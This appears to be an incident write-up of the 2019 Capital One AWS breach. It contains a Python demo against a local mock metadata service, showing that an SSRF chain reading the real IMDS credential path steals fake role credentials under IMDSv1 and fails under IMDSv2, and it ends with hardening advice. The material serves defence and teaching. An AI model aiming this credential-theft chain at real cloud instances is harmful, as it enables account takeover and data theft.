In 2019, Capital One had the personal data from over 100 million consumer credit applications exfiltrated from its AWS environment. The root cause was a combination of two factors. First, a misconfigured Web Application Firewall (a ModSecurity deployment running on an EC2 instance) was vulnerable to Server Side Request Forgery (SSRF), which let the attacker relay requests through it to the instance metadata service (IMDS) at 169.254.169.254 and retrieve the temporary credentials of the instance's IAM role. Second, that role carried excessive IAM permissions, so the stolen credentials could be used to list and read objects from private S3 buckets in the account. The attacker used this access to exfiltrate nearly 30 GB of data, some of which she posted to GitHub. The breach was later attributed to Paige Thompson (AKA "Erratic"), who was convicted in 2022. AWS later released IMDSv2, which is session-oriented: a client must first obtain a token with an HTTP PUT request carrying a TTL header and then present that token on every metadata request. A typical SSRF that can only relay GET requests with no custom headers cannot complete that handshake, so IMDSv2, when enforced on the instance, would have stopped this credential theft even with the WAF flaw in place.
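The following is an added example, not code from the original page or from Capital One or AWS. It runs a local mock of the instance metadata service in IMDSv1 mode (token optional) and IMDSv2 mode (token required), then models the WAF flaw as a relay that can only issue plain GET requests to an attacker-chosen URL. The role name, credentials and the mock server are all constructed; the two-step credential path under /latest/meta-data/iam/security-credentials/ and the PUT token handshake under /latest/api/token are the real IMDS behaviour. The point it shows is that the same SSRF chain recovers credentials from v1 and fails against v2.

```python
import http.server
import json
import secrets
import threading
import urllib.error
import urllib.request

# Constructed fake role and credentials (hypothetical names, not real keys).
ROLE_NAME = "hypothetical-waf-role"
FAKE_CREDS = {"AccessKeyId": "ASIAEXAMPLEFAKEKEY00",
              "SecretAccessKey": "fake/secret", "Token": "fake-session-token"}
TOKEN_HDR = "X-aws-ec2-metadata-token"
TTL_HDR = "X-aws-ec2-metadata-token-ttl-seconds"


class MockIMDS(http.server.BaseHTTPRequestHandler):
    """Minimal local stand-in for 169.254.169.254. require_token=True models
    an instance with IMDSv2 enforced (http-tokens=required)."""
    require_token = False
    issued_tokens = set()

    def log_message(self, *args):  # keep the example quiet
        pass

    def _send(self, code, body=""):
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(body.encode())

    def do_PUT(self):
        # IMDSv2 session start: a PUT carrying a TTL header. A GET-only SSRF
        # relay can neither choose the method nor add this header.
        if self.path == "/latest/api/token" and self.headers.get(TTL_HDR):
            token = secrets.token_urlsafe(16)
            self.issued_tokens.add(token)
            return self._send(200, token)
        self._send(400)

    def do_GET(self):
        if self.require_token and self.headers.get(TOKEN_HDR) not in self.issued_tokens:
            return self._send(401)  # IMDSv2 refuses token-less metadata reads
        if self.path == "/latest/meta-data/iam/security-credentials/":
            return self._send(200, ROLE_NAME)  # v1 happily lists the role name
        if self.path == f"/latest/meta-data/iam/security-credentials/{ROLE_NAME}":
            return self._send(200, json.dumps(FAKE_CREDS))
        self._send(404)


def start_mock_imds(require_token):
    """Start a mock IMDS on an ephemeral localhost port; returns its base URL."""
    handler = type("IMDS", (MockIMDS,),
                   {"require_token": require_token, "issued_tokens": set()})
    server = http.server.HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_address[1]}"


def ssrf_relay(url):
    """Models the WAF flaw: fetch an attacker-supplied URL with a plain GET,
    no control over method or headers. Returns the body, or None on an error."""
    try:
        with urllib.request.urlopen(url, timeout=2) as resp:
            return resp.read().decode()
    except urllib.error.HTTPError:
        return None


def steal_role_credentials(imds_base):
    """The two-request chain that works against IMDSv1: role name, then creds."""
    role = ssrf_relay(imds_base + "/latest/meta-data/iam/security-credentials/")
    if not role:
        return None
    body = ssrf_relay(imds_base + "/latest/meta-data/iam/security-credentials/" + role)
    return json.loads(body) if body else None


def attack_works(require_token):
    """True if the GET-only SSRF chain recovers credentials from the mock IMDS."""
    creds = steal_role_credentials(start_mock_imds(require_token))
    return creds is not None and creds["AccessKeyId"] == FAKE_CREDS["AccessKeyId"]


def legitimate_v2_fetch(imds_base):
    """How on-instance code talks to IMDSv2: PUT for a token, then GET with it."""
    req = urllib.request.Request(imds_base + "/latest/api/token", method="PUT",
                                 headers={TTL_HDR: "21600"})
    with urllib.request.urlopen(req, timeout=2) as resp:
        token = resp.read().decode()
    req = urllib.request.Request(
        imds_base + f"/latest/meta-data/iam/security-credentials/{ROLE_NAME}",
        headers={TOKEN_HDR: token})
    with urllib.request.urlopen(req, timeout=2) as resp:
        return json.loads(resp.read().decode())


if __name__ == "__main__":
    print("IMDSv1 (token optional): SSRF steals creds ->", attack_works(False))
    print("IMDSv2 (token required): SSRF steals creds ->", attack_works(True))
    print("IMDSv2 legitimate fetch ->",
          legitimate_v2_fetch(start_mock_imds(True))["AccessKeyId"])
```

On a real instance the equivalent hardening is to require tokens on the metadata endpoint (the AWS CLI flag is `--http-tokens required` on `aws ec2 modify-instance-metadata-options`), and to keep the PUT response hop limit at 1 so the token handshake cannot be completed through a container or proxy hop. Note that IMDSv2 only closes the credential-theft step; the second factor in this incident, an over-privileged instance role, still has to be fixed by scoping the role's S3 permissions down to what the WAF actually needs.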
Type
Incident
Actors
Pub. date
July 19, 2019
Initial access
Cloud native misconfig
Impact
Data exfiltration
Observed techniques
References
https://nypost.com/2022/06/18/seattle-woman-paige-thompson-convicted-in-massive-capital-one-hack/
https://edition.cnn.com/2019/07/29/business/capital-one-data-breach/index.html
https://www.fugue.co/blog/a-technical-analysis-of-the-capital-one-cloud-misconfiguration-breach
https://www.capitalone.com/digital/facts2019/
https://ejj.io/blog/capital-one
https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
https://krebsonsecurity.com/2019/07/capital-one-data-theft-impacts-106m-people/
Status
Featured
Last edited
Jun 2, 2024 11:53 AM